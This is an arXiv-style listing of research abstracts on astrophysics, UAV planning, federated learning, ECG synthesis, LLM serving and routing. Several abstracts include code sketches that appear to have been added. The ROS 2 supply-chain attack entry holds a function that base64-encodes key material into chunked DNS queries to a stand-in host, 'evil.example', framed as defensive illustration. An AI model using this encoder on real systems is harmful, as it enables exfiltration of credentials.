F. Aharonian,
F. Ait Benkhali,
J. Aschersleben,
H. Ashkar,
M. Backes,
V. Barbosa Martins,
R. Batzofin
, et al. (809 additional authors not shown)
Abstract:
The search for sources of high-energy astrophysical neutrinos can be significantly advanced through a multi-messenger approach, which seeks to detect the gamma rays that accompany neutrinos as they are produced at their sources. Multi-messenger observations have so far provided the first evidence for a neutrino source, illustrated by the joint detection of the flaring blazar TXS 0506+056 in highen…
▽ More
The search for sources of high-energy astrophysical neutrinos can be significantly advanced through a multi-messenger approach, which seeks to detect the gamma rays that accompany neutrinos as they are produced at their sources. Multi-messenger observations have so far provided the first evidence for a neutrino source, illustrated by the joint detection of the flaring blazar TXS 0506+056 in high-energy (HE, E > 1 GeV) and very-high-energy (VHE, E > 100 GeV) gamma rays in coincidence with the high-energy neutrino IceCube-170922A, identified by IceCube. Imaging atmospheric Cherenkov telescopes (IACTs), namely FACT, H.E.S.S., MAGIC, and VERITAS, continue to conduct extensive neutrino target-of-opportunity follow-up programs. These programs have two components: follow-up observations of single astrophysical neutrino candidate events (such as IceCube-170922A), and observation of known gamma-ray sources after the identification of a cluster of neutrino events by IceCube. Here we present a comprehensive analysis of follow-up observations of high-energy neutrino events observed by the four IACTs between September 2017 (after the IceCube-170922A event) and January 2021. Our study found no associations between gamma-ray sources and the observed neutrino events. We provide a detailed overview of each neutrino event and its potential counterparts. Furthermore, a joint analysis of all IACT data is included, yielding combined upper limits on the VHE gamma-ray flux.
△ Less
Submitted 18 December, 2025;
originally announced December 2025.
-
Flow-Based Path Planning for Multiple Homogenous UAVs for Outdoor Formation-Flying
Authors:
Mahmud Suhaimi Ibrahim,
Shantanu Rahman,
Muhammad Samin Hasan,
Minhaj Uddin Ahmad,
Abdullah Abrar
Abstract:
Collision-free path planning is the most crucial component in multi-UAV formation-flying (MFF). We use unlabeled homogenous quadcopters (UAVs) to demonstrate the use of a flow network to create complete (inter-UAV) collision-free paths. This procedure has three main parts: 1) Creating a flow network graph from physical GPS coordinates, 2) Finding a path of minimum cost (least distance) using any g…
▽ More
Collision-free path planning is the most crucial component in multi-UAV formation-flying (MFF). We use unlabeled homogenous quadcopters (UAVs) to demonstrate the use of a flow network to create complete (inter-UAV) collision-free paths. This procedure has three main parts: 1) Creating a flow network graph from physical GPS coordinates, 2) Finding a path of minimum cost (least distance) using any graph-based path-finding algorithm, and 3) Implementing the Ford-Fulkerson Method to find the paths with the maximum flow (no collision). Simulations of up to 64 UAVs were conducted for various formations, followed by a practical experiment with 3 quadcopters for testing physical plausibility and feasibility. The results of these tests demonstrate the method's ability to produce safe, collision-free paths.
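Step 3 above, computing maximum flow so that no two UAVs share a capacity-limited waypoint, can be sketched with a BFS-based Ford-Fulkerson routine (Edmonds-Karp). The toy network below is hypothetical, not the paper's GPS-derived graph:

```python
from collections import deque

def max_flow(capacity, source, sink):
    """Edmonds-Karp: repeatedly find a shortest augmenting path by BFS
    in the residual graph; returns the maximum flow value."""
    n = len(capacity)
    flow = [[0] * n for _ in range(n)]
    total = 0
    while True:
        parent = [-1] * n
        parent[source] = source
        q = deque([source])
        while q and parent[sink] == -1:
            u = q.popleft()
            for v in range(n):
                if parent[v] == -1 and capacity[u][v] - flow[u][v] > 0:
                    parent[v] = u
                    q.append(v)
        if parent[sink] == -1:
            return total  # no augmenting path remains
        # bottleneck along the path, then augment forward/backward flow
        v, bottleneck = sink, float("inf")
        while v != source:
            u = parent[v]
            bottleneck = min(bottleneck, capacity[u][v] - flow[u][v])
            v = u
        v = sink
        while v != source:
            u = parent[v]
            flow[u][v] += bottleneck
            flow[v][u] -= bottleneck
            v = u
        total += bottleneck

# Hypothetical toy network: a virtual source feeds two UAV start nodes,
# which share one intermediate waypoint whose capacity of 1 admits only
# one UAV, so the maximum flow (collision-free throughput) is 1.
cap = [
    [0, 1, 1, 0, 0],  # source -> UAV starts
    [0, 0, 0, 1, 0],  # start A -> waypoint
    [0, 0, 0, 1, 0],  # start B -> waypoint
    [0, 0, 0, 0, 1],  # waypoint -> sink (capacity 1)
    [0, 0, 0, 0, 0],
]
print(max_flow(cap, 0, 4))
```

A flow value below the number of UAVs signals that the chosen waypoints cannot carry all vehicles without conflict, prompting a different formation routing.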
△ Less
Submitted 24 November, 2025;
originally announced November 2025.
-
FedPoisonTTP: A Threat Model and Poisoning Attack for Federated Test-Time Personalization
Authors:
Md Akil Raihan Iftee,
Syed Md. Ahnaf Hasan,
Amin Ahsan Ali,
AKM Mahbubur Rahman,
Sajib Mistry,
Aneesh Krishna
Abstract:
Test-time personalization in federated learning enables models at clients to adjust online to local domain shifts, enhancing robustness and personalization in deployment. Yet, existing federated learning work largely overlooks the security risks that arise when local adaptation occurs at test time. Heterogeneous domain arrivals, diverse adaptation algorithms, and limited cross-client visibility cr…
▽ More
Test-time personalization in federated learning enables models at clients to adjust online to local domain shifts, enhancing robustness and personalization in deployment. Yet, existing federated learning work largely overlooks the security risks that arise when local adaptation occurs at test time. Heterogeneous domain arrivals, diverse adaptation algorithms, and limited cross-client visibility create vulnerabilities where compromised participants can craft poisoned inputs and submit adversarial updates that undermine both global and per-client performance. To address this threat, we introduce FedPoisonTTP, a realistic grey-box attack framework that explores test-time data poisoning in the federated adaptation setting. FedPoisonTTP distills a surrogate model from adversarial queries, synthesizes in-distribution poisons using feature-consistency, and optimizes attack objectives to generate high-entropy or class-confident poisons that evade common adaptation filters. These poisons are injected during local adaptation and spread through collaborative updates, leading to broad degradation. Extensive experiments on corrupted vision benchmarks show that compromised participants can substantially diminish overall test-time performance.
△ Less
Submitted 24 November, 2025;
originally announced November 2025.
-
pFedBBN: A Personalized Federated Test-Time Adaptation with Balanced Batch Normalization for Class-Imbalanced Data
Authors:
Md Akil Raihan Iftee,
Syed Md. Ahnaf Hasan,
Mir Sazzat Hossain,
Rakibul Hasan Rajib,
Amin Ahsan Ali,
AKM Mahbubur Rahman,
Sajib Mistry,
Monowar Bhuyan
Abstract:
Test-time adaptation (TTA) in federated learning (FL) is crucial for handling unseen data distributions across clients, particularly when faced with domain shifts and skewed class distributions. Class Imbalance (CI) remains a fundamental challenge in FL, where rare but critical classes are often severely underrepresented in individual client datasets. Although prior work has addressed CI during tr…
▽ More
Test-time adaptation (TTA) in federated learning (FL) is crucial for handling unseen data distributions across clients, particularly when faced with domain shifts and skewed class distributions. Class Imbalance (CI) remains a fundamental challenge in FL, where rare but critical classes are often severely underrepresented in individual client datasets. Although prior work has addressed CI during training through reliable aggregation and local class distribution alignment, these methods typically rely on access to labeled data or coordination among clients, and none address unsupervised adaptation to dynamic domains or distribution shifts at inference time under federated CI constraints. Revealing the failure of state-of-the-art TTA in federated client adaptation under CI, we propose pFedBBN, a personalized federated test-time adaptation framework that employs balanced batch normalization (BBN) during local client adaptation to mitigate prediction bias by treating all classes equally. It also enables client collaboration guided by BBN similarity, ensuring that clients with similar balanced representations reinforce each other and that adaptation remains aligned with domain-specific characteristics. pFedBBN supports fully unsupervised local adaptation and introduces a class-aware model aggregation strategy that enables personalized inference without compromising privacy. It addresses both distribution shifts and class imbalance through balanced feature normalization and domain-aware collaboration, without requiring any labeled or raw data from clients. Extensive experiments across diverse baselines show that pFedBBN consistently enhances robustness and minority-class performance over state-of-the-art FL and TTA methods.
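The balanced-normalization idea, estimating statistics per class and then averaging them with equal weight so a majority class cannot dominate, can be sketched in one dimension (a simplified illustration, not the paper's per-channel BN layer):

```python
def balanced_batchnorm_stats(features, labels):
    """Balanced BN sketch: compute mean/variance separately per class,
    then average the per-class statistics with EQUAL weight, so the
    normalization is not dominated by the majority class."""
    classes = sorted(set(labels))
    means, variances = [], []
    for c in classes:
        xs = [x for x, y in zip(features, labels) if y == c]
        m = sum(xs) / len(xs)
        means.append(m)
        variances.append(sum((x - m) ** 2 for x in xs) / len(xs))
    return sum(means) / len(classes), sum(variances) / len(classes)

# Hypothetical imbalanced batch: 9 majority samples near 0, 1 minority at 10.
feats = [0.0] * 9 + [10.0]
labs = [0] * 9 + [1]
bal_mean, _ = balanced_batchnorm_stats(feats, labs)
naive_mean = sum(feats) / len(feats)
print(bal_mean, naive_mean)  # 5.0 vs 1.0
```

The naive batch mean (1.0) sits almost entirely inside the majority class, whereas the balanced mean (5.0) gives the minority class equal say, which is the bias-mitigation effect the abstract describes.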
△ Less
Submitted 22 November, 2025;
originally announced November 2025.
-
A Dual-Memory Ferroelectric Transistor Emulating Synaptic Metaplasticity for High-Speed Reservoir Computing
Authors:
Yifan Wang,
Muhammad Sakib Shahriar,
Salma Soliman,
Noah Vaillancourt,
Lance Fernandes,
Andrea Padovani,
Asif Islam Khan,
Md Sakib Hasan,
Raisul Islam
Abstract:
The exponential growth of edge artificial intelligence demands material-focused solutions to overcome energy consumption and latency limitations when processing real-time temporal data. Physical reservoir computing (PRC) offers an energy-efficient paradigm but faces challenges due to limited device scalability and reconfigurability. Additionally, reservoir and readout layers require memory of diff…
▽ More
The exponential growth of edge artificial intelligence demands material-focused solutions to overcome energy consumption and latency limitations when processing real-time temporal data. Physical reservoir computing (PRC) offers an energy-efficient paradigm but faces challenges due to limited device scalability and reconfigurability. Additionally, reservoir and readout layers require memory of different timescales, short-term and long-term respectively, a material challenge hindering CMOS-compatible implementations. This work demonstrates a CMOS-compatible ferroelectric transistor using hafnium-zirconium-oxide (HZO) and silicon, enabling dual-memory operation. This system exhibits non-volatile long-term memory (LTM) from ferroelectric HZO polarization and volatile short-term memory (STM) from engineered non-quasi-static (NQS) channel-charge relaxation driven by gate-source/drain overlap capacitance. Ferroelectric polarization acts as non-volatile programming of volatile dynamics: by modulating threshold voltage, the ferroelectric state deterministically switches the NQS time constant and computational behavior between paired-pulse facilitation (PPF) and depression (PPD). This establishes a generalizable material-design principle applicable to diverse ferroelectric-semiconductor heterostructures, extending beyond silicon to oxide semiconductors and heterogeneously-integrated systems. The device solves second-order nonlinear tasks with 3.69 x 10^-3 normalized error using only 16 reservoir states (a ~5x reduction), achieving a 20 µs response time (~1000x faster) and 1.5 x 10^-7 J energy consumption, providing an immediately manufacturable pathway for neuromorphic hardware and energy-efficient edge intelligence.
△ Less
Submitted 10 November, 2025;
originally announced November 2025.
-
Emotion Detection in Speech Using Lightweight and Transformer-Based Models: A Comparative and Ablation Study
Authors:
Lucky Onyekwelu-Udoka,
Md Shafiqul Islam,
Md Shahedul Hasan
Abstract:
Emotion recognition from speech plays a vital role in the development of empathetic human-computer interaction systems. This paper presents a comparative analysis of lightweight transformer-based models, DistilHuBERT and PaSST, by classifying six core emotions from the CREMA-D dataset. We benchmark their performance against a traditional CNN-LSTM baseline model using MFCC features. DistilHuBERT de…
▽ More
Emotion recognition from speech plays a vital role in the development of empathetic human-computer interaction systems. This paper presents a comparative analysis of lightweight transformer-based models, DistilHuBERT and PaSST, by classifying six core emotions from the CREMA-D dataset. We benchmark their performance against a traditional CNN-LSTM baseline model using MFCC features. DistilHuBERT demonstrates superior accuracy (70.64%) and F1 score (70.36%) while maintaining an exceptionally small model size (0.02 MB), outperforming both PaSST and the baseline. Furthermore, we conducted an ablation study on three variants of the PaSST, Linear, MLP, and Attentive Pooling heads, to understand the effect of classification head architecture on model performance. Our results indicate that PaSST with an MLP head yields the best performance among its variants but still falls short of DistilHuBERT. Among the emotion classes, angry is consistently the most accurately detected, while disgust remains the most challenging. These findings suggest that lightweight transformers like DistilHuBERT offer a compelling solution for real-time speech emotion recognition on edge devices. The code is available at: https://github.com/luckymaduabuchi/Emotion-detection-.
△ Less
Submitted 1 November, 2025;
originally announced November 2025.
-
Supply Chain Exploitation of Secure ROS 2 Systems: A Proof-of-Concept on Autonomous Platform Compromise via Keystore Exfiltration
Authors:
Tahmid Hasan Sakib,
Yago Romano Martinez,
Carter Brady,
Syed Rafay Hasan,
Terry N. Guo
Abstract:
This paper presents a proof-of-concept supply chain attack against the Secure ROS 2 (SROS 2) framework, demonstrated on a Quanser QCar2 autonomous vehicle platform. A Trojan-infected Debian package modifies core ROS 2 security commands to exfiltrate newly generated keystore credentials via DNS in base64-encoded chunks to an attacker-controlled nameserver. Possession of these credentials enables th…
▽ More
This paper presents a proof-of-concept supply chain attack against the Secure ROS 2 (SROS 2) framework, demonstrated on a Quanser QCar2 autonomous vehicle platform. A Trojan-infected Debian package modifies core ROS 2 security commands to exfiltrate newly generated keystore credentials via DNS in base64-encoded chunks to an attacker-controlled nameserver. Possession of these credentials enables the attacker to rejoin the SROS 2 network as an authenticated participant and publish spoofed control or perception messages without triggering authentication failures. We evaluate this capability on a secure ROS 2 Humble testbed configured for a four-stop-sign navigation routine using an Intel RealSense camera for perception. Experimental results show that control-topic injections can cause forced braking, sustained high-speed acceleration, and continuous turning loops, while perception-topic spoofing can induce phantom stop signs or suppress real detections. The attack generalizes to any data distribution service (DDS)-based robotic system using SROS 2, highlighting the need for both supply chain integrity controls and runtime semantic validation to safeguard autonomous systems against insider and impersonation threats.
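The exfiltration encoding described above, base64 chunks carried in DNS query labels, can be illustrated for defensive analysis with a short sketch (hypothetical payload and domain; real DNS labels are limited to 63 bytes, which is what forces the chunking):

```python
import base64

def dns_chunks(secret: bytes, domain: str, label_max: int = 63):
    """Illustration (for defensive analysis) of the encoding scheme:
    base64url-encode the data, split it into DNS-label-sized chunks,
    and prefix each with a sequence counter so the receiving
    nameserver can reassemble the stream."""
    enc = base64.urlsafe_b64encode(secret).decode().rstrip("=")
    labels = [enc[i:i + label_max] for i in range(0, len(enc), label_max)]
    return [f"{i}.{label}.{domain}" for i, label in enumerate(labels)]

queries = dns_chunks(b"-----BEGIN PRIVATE KEY-----" + b"A" * 100,
                     "evil.example")
print(len(queries))
```

Monitoring for exactly this pattern, bursts of long, high-entropy labels under a single unfamiliar domain, is one of the runtime countermeasures the paper's threat model motivates.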
△ Less
Submitted 31 October, 2025;
originally announced November 2025.
-
Collective Communication for 100k+ GPUs
Authors:
Min Si,
Pavan Balaji,
Yongzhou Chen,
Ching-Hsiang Chu,
Adi Gangidi,
Saif Hasan,
Subodh Iyengar,
Dan Johnson,
Bingzhe Liu,
Regina Ren,
Deep Shah,
Ashmitha Jeevaraj Shetty,
Greg Steinbrecher,
Yulun Wang,
Bruce Wu,
Xinfeng Xie,
Jingyi Yang,
Mingran Yang,
Kenny Yu,
Minlan Yu,
Cen Zhao,
Wes Bland,
Denis Boyda,
Suman Gumudavelli,
Prashanth Kannan
, et al. (14 additional authors not shown)
Abstract:
The increasing scale of large language models (LLMs) necessitates highly efficient collective communication frameworks, particularly as training workloads extend to hundreds of thousands of GPUs. Traditional communication methods face significant throughput and latency limitations at this scale, hindering both the development and deployment of state-of-the-art models. This paper presents the NCCLX…
▽ More
The increasing scale of large language models (LLMs) necessitates highly efficient collective communication frameworks, particularly as training workloads extend to hundreds of thousands of GPUs. Traditional communication methods face significant throughput and latency limitations at this scale, hindering both the development and deployment of state-of-the-art models. This paper presents the NCCLX collective communication framework, developed at Meta, engineered to optimize performance across the full LLM lifecycle, from the synchronous demands of large-scale training to the low-latency requirements of inference. The framework is designed to support complex workloads on clusters exceeding 100,000 GPUs, ensuring reliable, high-throughput, and low-latency data exchange. Empirical evaluation on the Llama4 model demonstrates substantial improvements in communication efficiency. This research contributes a robust solution for enabling the next generation of LLMs to operate at unprecedented scales.
△ Less
Submitted 9 January, 2026; v1 submitted 22 October, 2025;
originally announced October 2025.
-
An Explorative Study on Distributed Computing Techniques in Training and Inference of Large Language Models
Authors:
Sheikh Azizul Hakim,
Saem Hasan
Abstract:
Large language models (LLM) are advanced AI systems trained on extensive textual data, leveraging deep learning techniques to understand and generate human-like language. Today's LLMs with billions of parameters are so huge that hardly any single computing node can train, fine-tune, or infer from them. Therefore, several distributed computing techniques are being introduced in the literature to pr…
▽ More
Large language models (LLMs) are advanced AI systems trained on extensive textual data, leveraging deep learning techniques to understand and generate human-like language. Today's LLMs, with billions of parameters, are so large that hardly any single computing node can train, fine-tune, or infer from them. Therefore, several distributed computing techniques have been introduced in the literature to properly utilize LLMs. We explore the application of distributed computing techniques to LLMs from two angles. First, we study techniques that democratize LLMs, that is, how large models can be run on consumer-grade computers; here, we also implement a novel metaheuristics-based modification to an existing system. Second, we perform a comparative study of three state-of-the-art LLM serving techniques.
△ Less
Submitted 13 October, 2025;
originally announced October 2025.
-
High-Fidelity Synthetic ECG Generation via Mel-Spectrogram Informed Diffusion Training
Authors:
Zhuoyi Huang,
Nutan Sahoo,
Anamika Kumari,
Girish Kumar,
Kexuan Cai,
Shixing Cao,
Yue Kang,
Tian Xia,
Somya Chatterjee,
Nicholas Hausman,
Aidan Jay,
Eric S. Rosenthal,
Soundar Srinivasan,
Sadid Hasan,
Alex Fedorov,
Sulaiman Vesal
Abstract:
The development of machine learning for cardiac care is severely hampered by privacy restrictions on sharing real patient electrocardiogram (ECG) data. Although generative AI offers a promising solution, the real-world use of existing model-synthesized ECGs is limited by persistent gaps in trustworthiness and clinical utility. In this work, we address two major shortcomings of current generative E…
▽ More
The development of machine learning for cardiac care is severely hampered by privacy restrictions on sharing real patient electrocardiogram (ECG) data. Although generative AI offers a promising solution, the real-world use of existing model-synthesized ECGs is limited by persistent gaps in trustworthiness and clinical utility. In this work, we address two major shortcomings of current generative ECG methods: insufficient morphological fidelity and the inability to generate personalized, patient-specific physiological signals. To address these gaps, we build on a conditional diffusion-based Structured State Space Model (SSSD-ECG) with two principled innovations: (1) MIDT-ECG (Mel-Spectrogram Informed Diffusion Training), a novel training paradigm with time-frequency domain supervision to enforce physiological structural realism, and (2) multi-modal demographic conditioning to enable patient-specific synthesis. We comprehensively evaluate our approach on the PTB-XL dataset, assessing the synthesized ECG signals on fidelity, clinical coherence, privacy preservation, and downstream task utility. MIDT-ECG achieves substantial gains: it improves morphological coherence, preserves strong privacy guarantees, with all evaluated metrics exceeding the baseline by 4-8%, and notably reduces the interlead correlation error by an average of 74%, while demographic conditioning enhances signal-to-noise ratio and personalization. In critical low-data regimes, a classifier trained on datasets supplemented with our synthetic ECGs achieves performance comparable to a classifier trained solely on real data. Together, we demonstrate that ECG synthesizers, trained with the proposed time-frequency structural regularization scheme, can serve as personalized, high-fidelity, privacy-preserving surrogates when real data are scarce, advancing the responsible use of generative AI in healthcare.
△ Less
Submitted 8 October, 2025; v1 submitted 6 October, 2025;
originally announced October 2025.
-
One Head, Many Models: Cross-Attention Routing for Cost-Aware LLM Selection
Authors:
Roshini Pulishetty,
Mani Kishan Ghantasala,
Keerthy Kaushik Dasoju,
Niti Mangwani,
Vishal Garimella,
Aditya Mate,
Somya Chatterjee,
Yue Kang,
Ehi Nosakhare,
Sadid Hasan,
Soundar Srinivasan
Abstract:
The proliferation of large language models (LLMs) with varying computational costs and performance profiles presents a critical challenge for scalable, cost-effective deployment in real-world applications. We introduce a unified routing framework that leverages a single-head cross-attention mechanism to jointly model query and model embeddings, enabling dynamic selection of the optimal LLM for eac…
▽ More
The proliferation of large language models (LLMs) with varying computational costs and performance profiles presents a critical challenge for scalable, cost-effective deployment in real-world applications. We introduce a unified routing framework that leverages a single-head cross-attention mechanism to jointly model query and model embeddings, enabling dynamic selection of the optimal LLM for each input query. Our approach is evaluated on RouterBench, a large-scale, publicly available benchmark encompassing diverse LLM pools and domains. By explicitly capturing fine-grained query-model interactions, our router predicts both response quality and generation cost, achieving up to 6.6% improvement in Average Improvement in Quality (AIQ) and 2.9% in maximum performance over existing routers. To robustly balance performance and cost, we propose an exponential reward function that enhances stability across user preferences. The resulting architecture is lightweight, generalizes effectively across domains, and demonstrates improved efficiency compared to prior methods, establishing a new standard for cost-aware LLM routing.
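The core routing computation, a query embedding attending over model embeddings, combined with an exponential reward that trades quality against cost, might look roughly like the hand-rolled sketch below (untrained toy embeddings and scores, not the paper's learned architecture):

```python
import math

def route(query, model_embs, qualities, costs, lam=1.0):
    """Single-head cross-attention routing sketch: scaled dot-product
    attention of the query over model embeddings, weighted by an
    exponential quality-cost reward. `lam` sets the cost penalty."""
    d = len(query)
    scores = [sum(q * m for q, m in zip(query, emb)) / math.sqrt(d)
              for emb in model_embs]
    mx = max(scores)
    exps = [math.exp(s - mx) for s in scores]
    attn = [e / sum(exps) for e in exps]  # softmax attention weights
    # exponential reward: favour predicted quality, discount cost
    rewards = [a * math.exp(q - lam * c)
               for a, q, c in zip(attn, qualities, costs)]
    return max(range(len(rewards)), key=rewards.__getitem__)

query = [1.0, 0.0]
model_embs = [[1.0, 0.0], [0.0, 1.0]]  # model 0 matches the query domain
best = route(query, model_embs, qualities=[0.8, 0.9], costs=[0.1, 1.0])
print(best)
```

With a nonzero cost penalty the router prefers the cheaper, domain-matched model 0 even though model 1 has slightly higher raw quality; raising or lowering `lam` shifts that balance, which is the user-preference stability the exponential reward is meant to provide.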
△ Less
Submitted 11 September, 2025;
originally announced September 2025.
-
Handling Open-Vocabulary Constructs in Formalizing Specifications: Retrieval-Augmented Parsing with Expert Knowledge
Authors:
Mohammad Saqib Hasan,
Sayontan Ghosh,
Dhruv Verma,
Geoff Kuenning,
Erez Zadok,
Scott A. Smolka,
Niranjan Balasubramanian
Abstract:
We study the problem of Open-Vocabulary Constructs(OVCs) -- ones not known beforehand -- in the context of converting natural language (NL) specifications into formal languages (e.g., temporal logic or code). Models fare poorly on OVCs due to a lack of necessary knowledge a priori. In such situations, a domain expert can provide correct constructs at inference time based on their preferences or do…
▽ More
We study the problem of Open-Vocabulary Constructs (OVCs) -- ones not known beforehand -- in the context of converting natural language (NL) specifications into formal languages (e.g., temporal logic or code). Models fare poorly on OVCs due to a lack of necessary knowledge a priori. In such situations, a domain expert can provide correct constructs at inference time based on their preferences or domain knowledge. Our goal is to effectively reuse this inference-time, expert-provided knowledge for future parses without retraining the model. We present dynamic knowledge-augmented parsing (DKAP), where in addition to the input sentence, the model receives (dynamically growing) expert knowledge as a key-value lexicon that associates NL phrases with correct OVC constructs. We propose ROLex, a retrieval-augmented parsing approach that uses this lexicon. A retriever and a generator are trained to find and use the key-value store to produce the correct parse. A key challenge lies in curating data for this retrieval-augmented parser. We utilize synthetic data generation and data augmentation techniques on annotated (NL sentence, FL statement) pairs to train the augmented parser. To improve training effectiveness, we propose multiple strategies to teach models to focus on the relevant subset of retrieved knowledge. Finally, we introduce a new evaluation paradigm modeled after the DKAP problem and simulate the scenario across three formalization tasks (NL2LTL, NL2Code, and NL2CMD). Our evaluations show that DKAP is a difficult challenge, and ROLex helps improve the performance of baseline models by using dynamic expert knowledge effectively.
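The dynamic lexicon lookup at the heart of DKAP can be sketched with a simple token-overlap retriever (illustrative only: ROLex trains its retriever, and the lexicon entries below are hypothetical):

```python
def retrieve(lexicon, sentence, k=2):
    """DKAP-style retrieval sketch: score each expert-provided
    (NL phrase -> formal construct) entry by token overlap with the
    input sentence and return the top-k matches, which would then be
    prepended to the parser's input as key-value knowledge."""
    tokens = set(sentence.lower().split())
    def overlap(phrase):
        p = set(phrase.lower().split())
        return len(p & tokens) / len(p)
    ranked = sorted(lexicon.items(), key=lambda kv: overlap(kv[0]),
                    reverse=True)
    return [kv for kv in ranked[:k] if overlap(kv[0]) > 0]

# Hypothetical expert lexicon, grown at inference time across the
# three formalization tasks (LTL, code, shell commands).
lexicon = {
    "eventually released": "F released",
    "always followed by an ack": "G (req -> F ack)",
    "list files recursively": "ls -R",
}
hits = retrieve(lexicon, "every request is always followed by an ack")
print(hits)
```

Because the lexicon only grows, a construct the expert supplies once (e.g. the `G (req -> F ack)` pattern) is available to every later parse without retraining, which is the reuse property the abstract targets.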
△ Less
Submitted 10 September, 2025;
originally announced September 2025.
-
ProST: Progressive Sub-task Training for Pareto-Optimal Multi-agent Systems Using Small Language Models
Authors:
Biddut Sarker Bijoy,
Mohammad Saqib Hasan,
Pegah Alipoormolabashi,
Avirup Sil,
Aruna Balasubramanian,
Niranjan Balasubramanian
Abstract:
Multi-agent systems with smaller language models (SLMs) present a viable alternative to single agent systems powered by large language models (LLMs) for addressing complex problems. In this work, we study how these alternatives compare in terms of both effectiveness and efficiency. To study this trade-off, we instantiate single and multi-agent systems for the complex problems in the AppWorld envir…
▽ More
Multi-agent systems with smaller language models (SLMs) present a viable alternative to single agent systems powered by large language models (LLMs) for addressing complex problems. In this work, we study how these alternatives compare in terms of both effectiveness and efficiency. To study this trade-off, we instantiate single and multi-agent systems for the complex problems in the AppWorld environment using different-sized language models.
We find that difficulties with long-trajectory learning in smaller language models (SLMs) limit their performance. Even when trained for specialized roles, SLMs fail to learn all sub-tasks effectively. To address this issue, we introduce a simple progressive sub-task training strategy, which introduces new sub-tasks progressively in each training epoch. We find that this novel strategy, analogous to instance-level curriculum learning, consistently improves the effectiveness of multi-agent systems across all configurations. Our Pareto analysis shows that fine-tuned multi-agent systems yield better effectiveness-efficiency trade-offs. Additional ablations and analyses show the importance of our progressive training strategy and its ability to reduce sub-task error rates.
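The progressive sub-task schedule, introducing new sub-tasks epoch by epoch until all are in the training mix, can be sketched as follows (one plausible reading of the strategy; sub-task names are hypothetical and the paper's exact schedule may differ):

```python
def progressive_schedule(subtasks, epochs):
    """Progressive sub-task training sketch: epoch e trains on the
    first min(e, n) sub-tasks, adding one new sub-task per epoch
    until the full set is covered (curriculum-style)."""
    n = len(subtasks)
    return [subtasks[:min(e, n)] for e in range(1, epochs + 1)]

sched = progressive_schedule(["plan", "call_api", "verify"], epochs=4)
for e, tasks in enumerate(sched, 1):
    print(e, tasks)
```

Early epochs let the SLM master short trajectories before longer multi-step ones are mixed in, which is the instance-level curriculum effect the abstract draws the analogy to.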
△ Less
Submitted 11 November, 2025; v1 submitted 2 September, 2025;
originally announced September 2025.
-
Automatic Question & Answer Generation Using Generative Large Language Model (LLM)
Authors:
Md. Alvee Ehsan,
A. S. M Mehedi Hasan,
Kefaya Benta Shahnoor,
Syeda Sumaiya Tasneem
Abstract:
In the realm of education, student evaluation holds equal significance to imparting knowledge. To be evaluated, students usually need to go through text-based academic assessment methods. Instructors need to create a diverse set of questions that are fair to all students as they demonstrate their command of a particular topic. This can prove quite challenging, as it may require manually going through several different lecture materials. Our objective is to make this whole process much easier by implementing Automatic Question Answer Generation (AQAG) using a fine-tuned generative LLM. Prompt Engineering (PE) is utilized to tailor the instructor's preferred question style (MCQ, conceptual, or factual questions). In this research, we propose to leverage unsupervised learning methods in NLP, primarily focusing on the English language. This approach empowers the base Meta-Llama 2-7B model to integrate the RACE dataset as training data for the fine-tuning process, creating a customized model that offers efficient solutions for educators, instructors, and individuals engaged in text-based evaluations. A reliable and efficient tool for generating questions and answers can free up valuable time and resources, thus streamlining their evaluation processes.
Submitted 28 September, 2025; v1 submitted 26 August, 2025;
originally announced August 2025.
-
Angular phase-space integrals with four denominators through Mellin--Barnes
Authors:
Taushif Ahmed,
Syed Mehedi Hasan,
Andreas Rapakoulias
Abstract:
We compute four-denominator angular phase-space integrals using the Mellin--Barnes (MB) technique in dimensional regularisation. Independent of the scattering process, an angular integral can be categorised based on the nature of the momenta appearing in the denominators. We address all scenarios involving fully massless and massive momenta. We present a partial fraction decomposition that relates angular integrals with multiple massive momenta to those with a single massive momentum. By solving six- and seven-fold MB integrals, we express the final results up to the finite order in the dimensional regulator in terms of Goncharov polylogarithms.
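For readers unfamiliar with the technique, the standard Mellin--Barnes representation underlying such computations trades a sum in a denominator for a contour integral over a product of Gamma functions:

```latex
\frac{1}{(A+B)^{\lambda}}
  = \frac{1}{2\pi i\,\Gamma(\lambda)}
    \int_{-i\infty}^{+i\infty} \mathrm{d}z\,
    \Gamma(-z)\,\Gamma(\lambda+z)\,\frac{B^{z}}{A^{\lambda+z}} ,
```

with the contour separating the poles of $\Gamma(-z)$ from those of $\Gamma(\lambda+z)$. Applying it repeatedly to the four angular denominators is what produces the six- and seven-fold MB integrals the abstract refers to.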
Submitted 21 August, 2025;
originally announced August 2025.
-
Improving MSA Estimation through Adaptive Weight Vectors in MOEA/D
Authors:
Saem Hasan,
Muhammad Ali Nayeem,
M. Sohel Rahman
Abstract:
Accurate phylogenetic inference from biological sequences depends critically on the quality of multiple sequence alignments, yet optimal alignment for many sequences is computationally intractable and sensitive to scoring choices. In this work we introduce MOEA/D-ADF, a novel variant of MOEA/D that adaptively adjusts subproblem weight vectors based on fitness variance to improve the exploration-exploitation trade-off. We combine MOEA/D-ADF with PMAO (PASTA with many application-aware optimization criteria) to form PMAO++, where PMAO-generated solutions are used to seed MOEA/D-ADF, which then evolves a population using 30 weight vectors to produce a diverse ensemble of alignment-tree pairs. PMAO++ outperforms the original PMAO on a majority of benchmark cases, achieving better false-negative (FN) rates on 12 of 17 BAliBASE-derived datasets and producing superior best-case trees, including several instances with zero FN rate. Beyond improving single best alignments, the rich set of alignment-tree pairs produced by PMAO++ is especially valuable for downstream summary methods (for example, consensus and summary-tree approaches), allowing more robust phylogenetic inference by integrating signal across multiple plausible alignments and trees. Certain dataset features, such as large terminal N/C extensions found in the RV40 group, remain challenging, but overall PMAO++ demonstrates clear advantages for sequence-based phylogenetic analysis. Future work will explore parameter tuning, larger benchmark suites, and tighter integration with summary-tree pipelines to further enhance applicability for biological sequence studies.
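The adaptive-weight idea behind MOEA/D-ADF can be sketched as follows. The abstract does not give the exact update rule, so this is a hedged illustration of one plausible mechanism: subproblems whose recent fitness variance has collapsed (stagnation) get their weight vectors randomly perturbed and renormalised, while progressing subproblems keep theirs.

```python
import random

def adapt_weights(weights, fitness_history, threshold=1e-3, step=0.05):
    """Hypothetical ADF-style update: if a subproblem's recent fitness
    variance falls below `threshold` (stagnation), nudge its weight
    vector randomly and renormalise; otherwise leave it unchanged."""
    new_weights = []
    for w, hist in zip(weights, fitness_history):
        mean = sum(hist) / len(hist)
        var = sum((f - mean) ** 2 for f in hist) / len(hist)
        if var < threshold:
            w = [max(0.0, wi + random.uniform(-step, step)) for wi in w]
            total = sum(w) or 1.0
            w = [wi / total for wi in w]
        new_weights.append(w)
    return new_weights
```

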